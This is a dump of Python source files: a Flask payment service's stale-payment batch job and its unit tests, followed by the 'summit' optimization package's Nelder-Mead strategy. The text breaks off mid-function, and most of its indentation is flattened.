setup_logging(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'logging.conf')) # important to do this first
# lower case name as used by convention in most Flask apps
jwt = JwtManager() # pylint: disable=invalid-name
def create_app(run_mode=os.getenv('FLASK_ENV', 'production')):
"""Return a configured Flask App using the Factory method."""
app = Flask(__name__)
app.config.from_object(config.CONFIGURATION[run_mode])
# Configure Sentry
if app.config.get('SENTRY_DSN', None): # pragma: no cover
sentry_sdk.init(
dsn=app.config.get('SENTRY_DSN'),
integrations=[FlaskIntegration()]
)
db.init_app(app)
ma.init_app(app)
setup_jwt_manager(app, jwt)
register_shellcontext(app)
return app
def setup_jwt_manager(app, jwt_manager):
"""Use flask app to configure the JWTManager to work for a particular Realm."""
def get_roles(a_dict):
return a_dict['realm_access']['roles'] # pragma: no cover
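    # Assumes Keycloak-style claims where roles live under realm_access, e.g. (illustrative):
    #   {'realm_access': {'roles': ['basic', 'staff']}}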
app.config['JWT_ROLE_CALLBACK'] = get_roles
jwt_manager.init_app(app)
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {
'app': app,
'jwt': jwt} # pragma: no cover
app.shell_context_processor(shell_context)
def run():
application = create_app()
application.logger.debug('Ran Batch Job--')
application.app_context().push()
update_stale_payments(application)
delete_marked_payments(application)
def update_stale_payments(app):
"""Update stale payment records.
    This handles edge cases where the user has completed payment but an error occurred and the payment status is not up to date.
"""
stale_transactions = PaymentTransactionModel.find_stale_records(minutes=30)
if len(stale_transactions) == 0:
        app.logger.info(f'Stale Transaction Job ran at {datetime.datetime.now()}, but no records were found.')
for transaction in stale_transactions:
try:
app.logger.info(
                'Stale Transaction Job found records. Payment Id: {}, Transaction Id: {}'.format(
                    transaction.payment_id, transaction.id))
TransactionService.update_transaction(transaction.payment_id, transaction.id, '')
app.logger.info(
                'Stale Transaction Job updated records. Payment Id: {}, Transaction Id: {}'.format(
                    transaction.payment_id, transaction.id))
        except BusinessException as err:  # just catch and continue; don't stop the loop
app.logger.error('Stale Transaction Error on update_transaction')
app.logger.error(err)
def delete_marked_payments(app):
"""Update stale payment records.
This is to handle edge cases where the user has completed payment and some error occured and payment status is not up-to-date.
"""
payments_to_delete = PaymentModel.find_payments_marked_for_delete()
if len(payments_to_delete) == 0:
        app.logger.info(f'Delete Payment Job ran at {datetime.datetime.now()}, but no records were found.')
for payment in payments_to_delete:
try:
            app.logger.info('Delete Payment Job found records. Payment Id: {}'.format(payment.id))
PaymentService.delete_payment(payment.id)
app.logger.info(
                'Delete Payment Job updated records. Payment Id: {}'.format(payment.id))
        except BusinessException as err:  # just catch and continue; don't stop the loop
app.logger.error('Error on delete_payment')
app.logger.error(err)
if __name__ == "__main__":
run()
```
#### File: unit/api/test_statement_settings.py
```python
import json
from datetime import timedelta
from pay_api.models import BcolPaymentAccount
from pay_api.models.payment import Payment
from pay_api.models.payment_account import PaymentAccount
from pay_api.utils.enums import StatementFrequency
from pay_api.utils.util import current_local_time, get_first_and_last_dates_of_month, get_week_start_and_end_date
from tests.utilities.base_test import (
get_claims, token_header, get_payment_request)
def test_get_default_statement_settings_weekly(session, client, jwt, app):
"""Assert that the default statement setting is weekly."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
rv = client.post('/api/v1/payment-requests', data=json.dumps(get_payment_request(business_identifier='CP0002000')),
headers=headers)
payment: Payment = Payment.find_by_id(rv.json.get('id'))
bcol_account: BcolPaymentAccount = BcolPaymentAccount.find_by_id(payment.invoices[0].bcol_account_id)
pay_account: PaymentAccount = PaymentAccount.find_by_id(bcol_account.account_id)
rv = client.get(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings',
headers=headers)
assert rv.status_code == 200
assert rv.json.get('frequency') == StatementFrequency.WEEKLY.value
def test_post_default_statement_settings_daily(session, client, jwt, app):
"""Assert that the post endpoint works."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
rv = client.post('/api/v1/payment-requests', data=json.dumps(get_payment_request(business_identifier='CP0002000')),
headers=headers)
payment: Payment = Payment.find_by_id(rv.json.get('id'))
bcol_account: BcolPaymentAccount = BcolPaymentAccount.find_by_id(payment.invoices[0].bcol_account_id)
pay_account: PaymentAccount = PaymentAccount.find_by_id(bcol_account.account_id)
rv = client.get(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings', data=json.dumps({}),
headers=headers)
assert rv.status_code == 200
assert rv.json.get('frequency') == StatementFrequency.WEEKLY.value
# Set the frequency to Daily and assert
daily_frequency = {'frequency': 'DAILY'}
rv = client.post(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings',
data=json.dumps(daily_frequency),
headers=headers)
assert rv.json.get('frequency') == StatementFrequency.DAILY.value
end_date = get_week_start_and_end_date()[1]
assert rv.json.get('fromDate') == (end_date + timedelta(days=1)).strftime('%Y-%m-%d')
# Set the frequency to Monthly and assert
daily_frequency = {'frequency': 'MONTHLY'}
rv = client.post(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings',
data=json.dumps(daily_frequency),
headers=headers)
end_date = get_first_and_last_dates_of_month(current_local_time().month, current_local_time().year)[1]
assert rv.json.get('frequency') == StatementFrequency.MONTHLY.value
assert rv.json.get('fromDate') == (end_date + timedelta(days=1)).strftime('%Y-%m-%d')
# Get the latest frequency
rv = client.get(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings', data=json.dumps({}),
headers=headers)
assert rv.status_code == 200
assert rv.json.get('frequency') == StatementFrequency.MONTHLY.value
```
#### File: unit/services/test_payment_service.py
```python
from unittest.mock import patch
import pytest
from flask import current_app
from requests.exceptions import ConnectionError, ConnectTimeout, HTTPError
from pay_api.exceptions import BusinessException, ServiceUnavailableException
from pay_api.models import CreditPaymentAccount, FeeSchedule, InternalPaymentAccount, Payment
from pay_api.services.payment_service import PaymentService
from pay_api.utils.enums import PaymentStatus, TransactionStatus, InvoiceStatus, PaymentMethod
from tests.utilities.base_test import (
factory_invoice, factory_invoice_reference, factory_payment, factory_payment_account, factory_payment_line_item,
factory_payment_transaction, get_auth_basic_user, get_auth_premium_user, get_payment_request,
get_payment_request_with_payment_method, get_zero_dollar_payment_request)
test_user_token = {'preferred_username': 'test'}
def test_create_payment_record(session, public_user_mock):
"""Assert that the payment records are created."""
payment_response = PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'CP',
get_auth_basic_user().get('account').get('id'))
account_id = account_model.id
assert account_id is not None
assert payment_response.get('id') is not None
# Create another payment with same request, the account should be the same
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'CP',
get_auth_basic_user().get('account').get('id'))
assert account_id == account_model.id
def test_create_payment_record_with_direct_pay(session, public_user_mock):
"""Assert that the payment records are created."""
current_app.config['DIRECT_PAY_ENABLED'] = True
payment_response = PaymentService.create_payment(
get_payment_request(), get_auth_basic_user(PaymentMethod.DIRECT_PAY.value))
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'CP',
get_auth_basic_user().get('account').get('id'))
account_id = account_model.id
assert account_id is not None
assert payment_response.get('id') is not None
# Create another payment with same request, the account should be the same
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'CP',
get_auth_basic_user().get('account').get('id'))
assert account_id == account_model.id
def test_create_payment_record_rollback(session, public_user_mock):
"""Assert that the payment records are created."""
    # Mock failures at different points in payment creation to test the rollback scenario
with patch('pay_api.services.invoice.Invoice.flush', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.payment.Payment.create', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.paybc_service.PaybcService.create_invoice', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
def test_update_payment_record(session, public_user_mock):
"""Assert that the payment records are updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
payment_response = PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert payment_response.get('id') is not None
def test_update_payment_record_transaction_invalid(session, public_user_mock):
"""Assert that the payment records are updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id, TransactionStatus.COMPLETED.value)
transaction.save()
payment_response = PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert payment_response.get('id') is not None
def test_update_payment_completed_invalid(session, public_user_mock):
"""Assert that the payment records are updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.payment_status_code = PaymentStatus.COMPLETED.value
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
with pytest.raises(BusinessException) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == BusinessException
def test_update_payment_deleted_invalid(session, public_user_mock):
"""Assert that the payment records are not updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.payment_status_code = PaymentStatus.DELETED.value
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
with pytest.raises(BusinessException) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == BusinessException
def test_update_payment_invoice_deleted_invalid(session, public_user_mock):
"""Assert that the payment records are not updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.invoice_status_code = InvoiceStatus.DELETED.value
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
payment_response = PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert payment_response.get('id') is not None
def test_update_payment_record_rollback(session, public_user_mock):
"""Assert that the payment records are updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
    # Mock failures at different points in payment update to test the rollback scenario
with patch(
'pay_api.services.payment_transaction.PaymentTransaction.find_active_by_payment_id',
side_effect=Exception('mocked error'),
):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch(
'pay_api.services.payment_transaction.PaymentTransaction.update_transaction',
side_effect=Exception('mocked error'),
):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.payment.Payment.find_by_id', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.payment_line_item.PaymentLineItem.create', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
# reset transaction
transaction = factory_payment_transaction(payment.id)
transaction.save()
with patch('pay_api.services.paybc_service.PaybcService.update_invoice', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
# reset transaction
transaction = factory_payment_transaction(payment.id)
transaction.save()
with patch('pay_api.services.invoice.Invoice.find_by_id', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
# reset transaction
transaction = factory_payment_transaction(payment.id)
transaction.save()
with patch('pay_api.services.invoice.Invoice.flush', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.payment.Payment.save', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
def test_create_payment_record_rollback_on_paybc_connection_error(session, public_user_mock):
"""Assert that the payment records are not created."""
    # Mock PayBC connection failures to test the rollback scenario
with patch('pay_api.services.oauth_service.requests.post', side_effect=ConnectionError('mocked error')):
with pytest.raises(ServiceUnavailableException) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == ServiceUnavailableException
with patch('pay_api.services.oauth_service.requests.post', side_effect=ConnectTimeout('mocked error')):
with pytest.raises(ServiceUnavailableException) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == ServiceUnavailableException
with patch('pay_api.services.oauth_service.requests.post', side_effect=HTTPError('mocked error')) as post_mock:
        post_mock.status_code = 503
with pytest.raises(HTTPError) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == HTTPError
def test_create_zero_dollar_payment_record(session, public_user_mock):
"""Assert that the payment records are created and completed."""
payment_response = PaymentService.create_payment(get_zero_dollar_payment_request(), get_auth_basic_user())
account_model = InternalPaymentAccount.find_by_corp_number_and_corp_type_and_account_id('CP0001234', 'CP',
get_auth_basic_user().get(
'account').get('id'))
account_id = account_model.id
assert account_id is not None
assert payment_response.get('id') is not None
assert payment_response.get('status_code') == 'COMPLETED'
# Create another payment with same request, the account should be the same
PaymentService.create_payment(get_zero_dollar_payment_request(), get_auth_basic_user())
account_model = InternalPaymentAccount.find_by_corp_number_and_corp_type_and_account_id('CP0001234', 'CP',
get_auth_basic_user().get(
'account').get('id'))
assert account_id == account_model.id
assert payment_response.get('status_code') == 'COMPLETED'
def test_delete_payment(session, auth_mock, public_user_mock):
"""Assert that the payment records are soft deleted."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
PaymentService.delete_payment(payment.id)
payment = Payment.find_by_id(payment.id)
assert payment.payment_status_code == PaymentStatus.DELETED.value
assert payment.invoices[0].invoice_status_code == InvoiceStatus.DELETED.value
def test_delete_completed_payment(session, auth_mock):
"""Assert that the payment records are soft deleted."""
payment_account = factory_payment_account()
payment = factory_payment(payment_status_code=PaymentStatus.COMPLETED.value)
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
with pytest.raises(Exception) as excinfo:
PaymentService.delete_payment(payment.id)
assert excinfo.type == BusinessException
def test_create_bcol_payment(session, public_user_mock):
"""Assert that the payment records are created."""
payment_response = PaymentService.create_payment(
get_payment_request_with_payment_method(payment_method='DRAWDOWN', business_identifier='CP0002000'),
get_auth_premium_user())
assert payment_response is not None
assert payment_response.get('payment_system') == 'BCOL'
assert payment_response.get('status_code') == 'COMPLETED'
def test_create_payment_record_with_service_charge(session, public_user_mock):
"""Assert that the payment records are created."""
# Create a payment request for corp type BC
payment_response = PaymentService.create_payment(get_payment_request(corp_type='BC', second_filing_type='OTFDR'),
get_auth_basic_user())
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'BC',
get_auth_basic_user().get('account').get('id'))
account_id = account_model.id
assert account_id is not None
assert payment_response.get('id') is not None
assert payment_response.get('invoices')[0].get('service_fees') == 1.50
```
|
{
"source": "jezsadler/summit",
"score": 3
}
|
#### File: summit/summit/__init__.py
```python
import pathlib
import shutil
def get_summit_config_path(config_dir_name=".summit"):
"""Returns the path to the summit config directory"""
home = pathlib.Path.home()
return home / config_dir_name
def clean_house(config_dir_name=".summit"):
"""This removes all the temporary files stored in the config directory"""
config_path = get_summit_config_path(config_dir_name)
shutil.rmtree(config_path)
from summit.domain import *
from summit.experiment import Experiment
from summit.run import Runner, NeptuneRunner
from summit.strategies import *
```
#### File: summit/strategies/neldermead.py
```python
from .base import Strategy, Transform
from summit.domain import *
from summit.domain import Domain
from summit.utils.dataset import DataSet
from summit.utils import jsonify_dict, unjsonify_dict
import numpy as np
import pandas as pd
from scipy.optimize import OptimizeResult
class NelderMead(Strategy):
"""Nelder-Mead Simplex
A reimplementation of the Nelder-Mead Simplex method adapted for sequential calls.
    This includes adaptations in terms of reflecting points, dimension reduction and dimension recovery
    proposed by Cortés-Borda et al.
Parameters
----------
domain : :class:`~summit.domain.Domain`
The domain of the optimization
transform : :class:`~summit.strategies.base.Transform`, optional
A transform object. By default no transformation will be done
on the input variables or objectives.
random_start : bool, optional
Whether to start at a random point or the value specified by x_start
adaptive : bool, optional
Adapt algorithm parameters to dimensionality of problem. Useful for
high-dimensional minimization. Default is False.
x_start: array_like of shape (1, N), optional
Initial center point of simplex
        Default: empty list; x_start is then initialized as the geometrical center point of the bounds
Note that x_start is ignored when initial call of suggest_exp contains prev_res and/or prev_param
dx: float, optional
Parameter for stopping criterion: two points are considered
to be different if they differ by at least dx(i) in at least one
coordinate i.
Default is 1E-5.
df: float, optional
Parameter for stopping criterion: two function values are considered
to be different if they differ by at least df.
Default is 1E-5.
Notes
-----
This is inspired by the work by [Cortés-Borda]_. Implementation partly follows the Nelder-Mead Simplex
implementation in `scipy-optimize <https://github.com/scipy/scipy/blob/master/scipy/optimize/optimize.py>`_
After the initialisation, the number of suggested experiments depends on the internal state of Nelder Mead.
Usually the algorithm requests 1 point per iteration, e.g., a reflection.
In some cases it requests more than 1 point, e.g., for shrinking the simplex.
References
----------
.. [Cortés-Borda] <NAME>.; <NAME>.; <NAME>.; <NAME>.; <NAME>.;
Truchet, C.; <NAME>.; <NAME>. Optimizing the Heck–Matsuda Reaction
in Flow with a Constraint-Adapted Direct Search Algorithm.
       Organic Process Research & Development 2016, 20, 1979–1987
Examples
--------
>>> from summit.domain import Domain, ContinuousVariable
>>> from summit.strategies import NelderMead
>>> domain = Domain()
>>> domain += ContinuousVariable(name='temperature', description='reaction temperature in celsius', bounds=[0, 1])
>>> domain += ContinuousVariable(name='flowrate_a', description='flow of reactant a in mL/min', bounds=[0, 1])
>>> domain += ContinuousVariable(name='yield', description='relative conversion to xyz', bounds=[0,100], is_objective=True, maximize=True)
>>> strategy = NelderMead(domain)
>>> next_experiments = strategy.suggest_experiments()
>>> print(next_experiments)
NAME temperature flowrate_a strategy
TYPE DATA DATA METADATA
0 0.500 0.500 Nelder-Mead Simplex
1 0.625 0.500 Nelder-Mead Simplex
2 0.500 0.625 Nelder-Mead Simplex
"""
def __init__(self, domain: Domain, transform: Transform = None, **kwargs):
Strategy.__init__(self, domain, transform, **kwargs)
self._x_start = kwargs.get("x_start", [])
self.random_start = kwargs.get("random_start", False)
self._dx = kwargs.get("dx", 1e-5)
self._df = kwargs.get("df", 1e-5)
self._adaptive = kwargs.get("adaptive", False)
self.prev_param = None
def suggest_experiments(self, prev_res: DataSet = None, **kwargs):
"""Suggest experiments using Nelder-Mead Simplex method
Parameters
----------
prev_res: summit.utils.data.DataSet, optional
Dataset with data from previous experiments.
If no data is passed, the Nelder-Mead optimization algorithm
will be initialized and suggest initial experiments.
Returns
-------
next_experiments: DataSet
A `Dataset` object with the suggested experiments by Nelder-Mead Simplex algorithm
Notes
------
After the initialisation, the number of suggested experiments depends on the internal state of Nelder Mead.
Usually the algorithm requests 1 point per iteration, e.g., a reflection.
In some cases it requests more than 1 point, e.g., for shrinking the simplex.
Thus, there is no `num_experiments` keyword argument.
"""
# get objective name and whether optimization is maximization problem
obj_name = None
obj_maximize = False
        i = 0
        for v in self.domain.variables:
            if v.is_objective:
                i += 1
if i > 1:
raise ValueError(
"Nelder-Mead is not able to optimize multiple objectives."
)
obj_name = v.name
if v.maximize:
obj_maximize = True
# get results from conducted experiments
if prev_res is not None:
prev_res = prev_res
# get parameters from previous iterations
inner_prev_param = None
if self.prev_param is not None:
# get parameters for Nelder-Mead from previous iterations
inner_prev_param = self.prev_param[0]
# recover invalid experiments from previous iteration
if self.prev_param[1] is not None:
invalid_res = self.prev_param[1].drop(("constraint", "DATA"), 1)
prev_res = pd.concat([prev_res, invalid_res])
## Generation of new suggested experiments.
# An inner function is called loop-wise to get valid experiments and
# avoid suggestions of experiments that violate constraints.
        # If no valid experiment is found after <inner_iter_tol> inner iterations, an error is raised.
inner_iter_tol = 5
c_iter = 0
valid_next_experiments = False
next_experiments = None
while not valid_next_experiments and c_iter < inner_iter_tol:
valid_next_experiments = False
next_experiments, xbest, fbest, param = self._inner_suggest_experiments(
prev_res=prev_res, prev_param=inner_prev_param
)
# Invalid experiments hidden from data returned to user but stored internally in param
invalid_experiments = next_experiments.loc[
next_experiments[("constraint", "DATA")] == False
]
next_experiments = next_experiments.loc[
next_experiments[("constraint", "DATA")] != False
]
prev_res = prev_res
if len(next_experiments) and len(invalid_experiments):
valid_next_experiments = True
if obj_maximize:
invalid_experiments[(obj_name, "DATA")] = float("-inf")
else:
invalid_experiments[(obj_name, "DATA")] = float("inf")
#
elif len(invalid_experiments):
if obj_maximize:
invalid_experiments[(obj_name, "DATA")] = float("-inf")
else:
invalid_experiments[(obj_name, "DATA")] = float("inf")
prev_res = invalid_experiments
else:
valid_next_experiments = True
inner_prev_param = param
param = [param, invalid_experiments]
c_iter += 1
if c_iter >= inner_iter_tol:
raise ValueError(
"No new points found. Internal stopping criterion is reached."
)
# return only valid experiments (invalid experiments are stored in param[1])
next_experiments = next_experiments.drop(("constraint", "DATA"), 1)
objective_dir = -1.0 if obj_maximize else 1.0
self.fbest = objective_dir * fbest
self.xbest = xbest
self.prev_param = param
return next_experiments
def reset(self):
"""Reset internal parameters"""
self.prev_param = None
def to_dict(self):
# Previous param first element is a dictionary of internal parameters
# Second element is a dataset with invalid experiments
if self.prev_param is not None:
prev_param = [
jsonify_dict(self.prev_param[0]),
self.prev_param[1].to_dict(),
]
else:
prev_param = None
strategy_params = dict(
x_start=self._x_start,
random_start=self.random_start,
dx=self._dx,
df=self._df,
adaptive=self._adaptive,
prev_param=prev_param,
)
return super().to_dict(**strategy_params)
@classmethod
def from_dict(cls, d):
nm = super().from_dict(d)
prev_param = d["strategy_params"]["prev_param"]
if prev_param is not None:
nm.prev_param = [
unjsonify_dict(prev_param[0]),
DataSet.from_dict(prev_param[1]),
]
return nm
def _inner_suggest_experiments(self, prev_res: DataSet = None, prev_param=None):
"""Inner loop for suggestion of experiments using Nelder-Mead Simplex method
Parameters
----------
prev_res: summit.utils.data.DataSet, optional
Dataset with data from previous experiments.
If no data is passed, the Nelder-Mead optimization algorithm
will be initialized and suggest initial experiments.
prev_param:
Parameters of Nelder-Mead algorithm from previous
            iterations of an optimization problem.
If no data is passed, the Nelder-Mead optimization algorithm
will be initialized.
"""
# intern
stay_inner = False
# Get bounds of input variables
bounds = []
input_var_names = []
output_var_names = []
for v in self.domain.variables:
if not v.is_objective:
if isinstance(v, ContinuousVariable):
bounds.append(v.bounds)
input_var_names.append(v.name)
elif isinstance(v, CategoricalVariable):
if v.ds is not None:
descriptor_names = v.ds.data_columns
descriptors = np.asarray(
[
v.ds.loc[:, [l]].values.tolist()
for l in v.ds.data_columns
]
)
else:
raise ValueError("No descriptors given for {}".format(v.name))
for d in descriptors:
bounds.append([np.min(np.asarray(d)), np.max(np.asarray(d))])
input_var_names.extend(descriptor_names)
else:
raise TypeError(
"Nelder-Mead can not handle variable type: {}".format(v.type)
)
else:
                output_var_names.append(v.name)
bounds = np.asarray(bounds, dtype=float)
# Extract dimension of input domain
dim = len(bounds[:, 0])
# Initialization
initial_run = True
x0 = [self._x_start]
y0 = []
# Get previous results
if prev_res is not None:
initial_run = False
inputs, outputs = self.transform.transform_inputs_outputs(
prev_res, categorical_method="descriptors"
)
# Set up maximization and minimization
for v in self.domain.variables:
if v.is_objective and v.maximize:
outputs[v.name] = -1 * outputs[v.name]
x0 = inputs.data_to_numpy()
y0 = outputs.data_to_numpy()
elif prev_param is not None:
raise ValueError(
"Parameter from previous optimization iteration are given but previous results are "
"missing!"
)
# if no previous results are given initialize center point as geometrical middle point of bounds
if len(x0[0]) == 0 and not self.random_start:
x0 = np.ones((1, len(bounds))) * 0.5 * ((bounds[:, 1] + bounds[:, 0]).T)
elif len(x0[0]) == 0 and self.random_start:
weight = np.random.rand()
            x0 = np.ones((1, len(bounds))) * (
                weight * bounds[:, 1] + (1 - weight) * bounds[:, 0]
            ).T
""" Set Nelder-Mead parameters, i.e., initialize or include data from previous iterations
--------
prev_sim: array-like
variable coordinates (points) of simplex from previous run
prev_fsim: array-like
function values corresponding to points of simplex from previous run
x_iter: array-like
variable coordinates and corresponding function values of potential new
simplex points determined in one iteration of the NMS algorithm; note that
within one iteration multiple points need to be evaluated; that's why we have
to store the points of an unfinished iteration (start iteration -> request point
-> run experiment -> restart same iteration with results of experiment
-> request point -> run experiment ... -> finish iteration)
red_dim: boolean
True if dimension was reduced in one of the previous iteration and has not been recovered yet
red_sim: array-like
variable coordinates (points) of simplex before dimension was reduced
red_fsim: array-like
function values of points corresponding to simplex before dimension was reduced
rec_dim: boolean
            True if dimension was recovered in the last iteration
memory: array-like
list of all points for which the function was evaluated
"""
prev_sim, prev_fsim, x_iter, red_dim, red_sim, red_fsim, rec_dim, memory = (
None,
None,
None,
None,
None,
None,
None,
[np.ones(dim) * float("inf")],
)
# if this is not the first iteration of the Nelder-Mead algorithm, get parameters from previous iteration
if prev_param:
prev_sim = prev_param["sim"]
red_dim = prev_param["red_dim"]
red_sim = prev_param["red_sim"]
red_fsim = prev_param["red_fsim"]
rec_dim = prev_param["rec_dim"]
memory = prev_param["memory"]
# if dimension was recovered in last iteration, N functions evaluations were requested
# that need to be assigned to the respective points in the simplex
if rec_dim:
prev_fsim = prev_param["fsim"]
for k in range(len(x0)):
for s in range(len(prev_sim)):
if np.array_equal(prev_sim[s], x0[k]):
prev_fsim[s] = y0[k]
rec_dim = False
# assign function values to respective points
elif prev_param["fsim"] is not None:
prev_fsim = prev_param["fsim"]
x_iter = prev_param["x_iter"]
for key, value in x_iter.items():
if value is not None:
if key == "x_shrink":
for k in range(len(x0)):
for j in range(len(value)):
if np.array_equal(value[j][0], np.asarray(x0[k])):
x_iter[key][j][1] = y0[k]
else:
for k in range(len(x0)):
if np.array_equal(value[0], np.asarray(x0[k])):
x_iter[key][1] = y0[k]
break
else:
prev_fsim = y0
# initialize with given simplex points (including function evaluations) for initialization
elif prev_res is not None:
prev_sim = x0
prev_fsim = y0
for p in x0.astype(float).tolist():
memory.append(p)
# Run Nelder-Mead Simplex algorithm for one iteration
overfull_simplex = False
if not red_dim:
request, sim, fsim, x_iter = self._minimize_neldermead(
x0=x0[0],
bounds=bounds,
x_iter=x_iter,
f=prev_fsim,
sim=prev_sim,
adaptive=self._adaptive,
)
if not initial_run:
(
overfull_simplex,
prev_sim,
prev_fsim,
red_sim,
red_fsim,
overfull_dim,
) = self.check_overfull(request, sim, fsim, bounds)
## Reduce dimension if n+1 points are located in n-1 dimensions (if either red_dim = True, i.e.,
# optimization in the reduced dimension space was not finished in the last iteration, or overfull_simplex, i.e.,
# last Nelder-Mead call (with red_dim = False) lead to an overfull simplex).
        ## Note that in order not to lose any information, the simplex without dimension reduction is returned even
# if the optimization in the reduced dimension space is not finished.
## If the optimization in the reduced dimension space was not finished in the last iteration (red_dim = True),
# the simplex will automatically be reduced again.
